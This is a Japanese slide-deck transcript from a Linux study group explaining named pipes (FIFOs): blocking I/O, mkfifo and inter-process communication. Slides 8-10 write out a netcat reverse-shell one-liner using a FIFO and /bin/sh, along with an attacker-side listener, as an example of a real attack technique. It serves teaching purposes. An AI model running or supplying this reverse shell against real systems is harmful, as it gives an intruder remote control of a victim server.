$30 off During Our Annual Pro Sale. View Details »

名前付きパイプ FIFO

Osumi, Yusuke
February 13, 2021
Technology
0
260

名前付きパイプ FIFO

「新しいLinuxの教科書」を読む会 オンライン #10 での発表資料です。
https://linuxbook.connpass.com/event/202890/

Osumi, Yusuke

February 13, 2021
Tweet

More Decks by Osumi, Yusuke

See All by Osumi, Yusuke
本の紹介の補足
ozuma
1
220
gitサービス3兄弟
ozuma
0
210
簡体字は楽
ozuma
0
250
ソフトウェアは固定資産
ozuma
0
240
ASCIIコードの小話
ozuma
0
250
今いるディレクトリを消すとどうなる
ozuma
1
130
文章、作文技法 リモートワーク
ozuma
1
630
CentOSの今後のリリース(簡易説明)
ozuma
0
230
AndroidでもLinux動いてるよ
ozuma
0
230

Other Decks in Technology

See All in Technology
分散型SNS最新状況
kojira
0
190
SmartHRのマルチプロダクト戦略実行の苦悩と挑戦
h1kita
5
3.2k
機械学習システム構築実践ガイド
shibuiwilliam
0
290
開発生産性大幅アップ!Postman VS Code拡張機能
nagix
0
130
AWS Security Hubを有効化したけど見てない人に向けたDevSecOpsの実現方法 / #kayac_andpad_event
muziyoshiz
0
190
20年以上続くサービスの 管理画面リプレイスを行いながら 技術的負債と向き合った話
radkmb
0
2.5k
分散ストレージはすごいぞ
sat
PRO
1
300
ChatGPT for Developer - 超入門
dahatake
41
23k
CI/CDプロセスの拡充からはじめる技術的負債の解消/Eliminate technical debt, starting with expanding CI/CD processes
onecareer_tech
0
550
Garoon 開発チーム / Garoon development team
cybozuinsideout
PRO
0
2.2k
VS CodeとPostmanを活用した効率的なAPI開発 / Efficient API development using VS Code and Postman
yokawasa
3
320
DMMオンラインサロン エンジニア採用資料/ for-software-engineers
onlinesalon
0
3.6k

Featured

See All Featured
Designing with Data
zakiwarfel
93
4.6k
[Rails World 2023 - Day 1 Closing Keynote] - The Magic of Rails
eileencodes
1
890
4 Signs Your Business is Dying
shpigford
172
21k
Fight the Zombie Pattern Library - RWD Summit 2016
marcelosomers
226
16k
Building Better People: How to give real-time feedback that sticks.
wjessup
349
18k
Creating an realtime collaboration tool: Agile Flush - .NET Oxford
marcduiker
10
1.3k
Easily Structure & Communicate Ideas using Wireframe
afnizarnur
185
15k
Building an army of robots
kneath
299
41k
How GitHub Uses GitHub to Build GitHub
holman
467
280k
How New CSS Is Changing Everything About Graphic Design on the Web
jensimmons
215
12k
ParisWeb 2013: Learning to Love: Crash Course in Emotional UX Design
dotmariusz
101
6.4k
The Art of Programming - Codeland 2020
erikaheidi
39
12k

Transcript

  1. 名前付きパイプ FIFO
    @ozuma5119
    1
    「新しいLinuxの教科書」を読む会 オンライン #10 2021/02/13

    View Slide

  2. 名前付きパイプ FIFO
    2
    書き込むと止まる(ブロッキングI/O)
    $ echo "Hello" > fifo
    $ tail -f fifo
    (別のターミナルで) 読み込んで解放

    View Slide

  3. 名前付きパイプ FIFO
    3
    先に読み込んでおく
    $ tail -f fifo
    $ echo "Hello" > fifo
    今度は書き込むとブロックされない

    View Slide

  4. 名前付きパイプ FIFO
    4
    書き込むと止まる(ブロッキングI/O)
    $ echo "Hello" > fifo
    1. 入出力中は他の処理が行えない (特に遅いディスクを扱う
    ときにつらい)
    2. ただし非同期処理で思わぬデータ破壊が起きにくい利点
    ※深い話なので、ここではこれ以上突っ込まない

    View Slide

  5. 5
    名前付きパイプ FIFO
    mkfifo - FIFO (名前付きパイプ) を作成する
    $ man mkfifo
    $ mkfifo fifo
    $ ls -l fifo
    prw-rw-r--. 1 ozuma ozuma 0 2月 12 20:47 fifo
    $

    View Slide

  6. 6
    $ cat sample.txt | sort
    $ cat sample.txt > fifo
    $ sort < fifo
    無名パイプ
    名前付きパイプ

    View Slide

  7. プロセス間通信に使われる
    7
    プロセス実行....
    ガッ
    SIGTERM(15)
    プロセスA
    プロセスB
    通信したいデータ
    シグナルによるプ
    ロセス間通信
    名前付きパイプによる
    プロセス間通信
    無名パイプ | と違って、
    2つのプロセスはバラバラに
    実行していて良い

    View Slide

  8. 高度な例(しかし実際の攻撃によく使われる)
    被害サーバ:ここでは /tmp/f が名前付きパイプ
    8
    $ nc < /tmp/f | /bin/sh >/tmp/f 2>&1
    攻撃者側サーバ:待ち受けておく
    $ nc -lvnp
    ※nc: netcatコマンド。ネットワークでデータストリームを流すcat
    サーバにバックドア Reverse Shell を作る

    View Slide

  9. 9
    攻撃者が攻撃対象のマシン
    上でコマンド実行
    (実際は、バレないように
    見えないところで実行)
    攻撃者のマシンに
    シェルがつながって
    自由に操作できる

    View Slide

  10. もう一度確認して解説
    被害サーバ:ここでは /tmp/f が名前付きパイプ
    10
    $ nc < /tmp/f | /bin/sh >/tmp/f 2>&1
    攻撃者側サーバ:待ち受けておく
    $ nc -lvnp
    ※nc: netcatコマンド。ネットワークでデータストリームを流すcat
    サーバにバックドア Reverse Shell を作る

    View Slide